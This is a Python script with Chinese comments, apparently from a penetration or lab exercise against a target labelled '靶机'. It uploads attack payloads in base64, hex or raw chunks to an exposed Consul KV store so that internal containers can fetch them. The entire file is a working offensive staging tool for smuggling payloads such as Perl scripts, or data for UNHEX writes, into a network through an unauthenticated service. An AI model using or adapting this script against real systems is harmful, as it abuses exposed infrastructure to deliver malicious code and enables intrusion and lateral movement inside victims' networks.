#!/usr/bin/env python3 # 文件名: consul_kv_upload.py # 用途: 将攻击载荷分块上传到 Consul KV,供内网容器下载 # 用法: python3 consul_kv_upload.py import requests, base64, sys TARGET = "192.168.1.111" # 靶机 IP KV_BASE = f"http://{TARGET}:8500/v1/kv" CHUNK_KB = 384 # 每块 384KB(base64 后 <512KB Consul 限制) def upload_file(filepath, prefix): with open(filepath, "rb") as f: data = f.read() # base64 编码 chunks = [base64.b64encode(data[i:i+CHUNK_KB*1024]).decode() for i in range(0, len(data), CHUNK_KB*1024)] print(f"[*] {filepath}: {len(data)} bytes → {len(chunks)} chunks") for i, chunk in enumerate(chunks): key = f"{prefix}/chunk_{i:03d}" r = requests.put(f"{KV_BASE}/{key}", data=chunk, timeout=10) if r.status_code != 200: print(f"[-] chunk_{i:03d} FAIL: {r.status_code}") return False if i % 5 == 0: print(f" [{i}/{len(chunks)}]") requests.put(f"{KV_BASE}/{prefix}/meta", data=f'{{"chunks":{len(chunks)},"size":{len(data)}}}') print(f"[+] {len(chunks)} chunks uploaded to {prefix}/") return True def upload_hex(filepath, prefix): """上传小文件为 hex(UNHEX 写入用)""" with open(filepath, "rb") as f: hex_data = f.read().hex() r = requests.put(f"{KV_BASE}/{prefix}/chunk_000", data=hex_data, timeout=10) print(f"[+] {len(hex_data)} hex chars uploaded → {KV_BASE}/{prefix}/chunk_000") def upload_raw(filepath, prefix): """上传文本文件(不编码),用于 Perl 脚本等""" with open(filepath, "rb") as f: data = f.read() r = requests.put(f"{KV_BASE}/{prefix}/chunk_000", data=data, timeout=10) print(f"[+] {len(data)} bytes uploaded → {KV_BASE}/{prefix}/chunk_000 (raw)") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: consul_kv_upload.py [--hex|--raw]") sys.exit(1) if "--hex" in sys.argv: upload_hex(sys.argv[1], sys.argv[2]) elif "--raw" in sys.argv: upload_raw(sys.argv[1], sys.argv[2]) else: upload_file(sys.argv[1], sys.argv[2])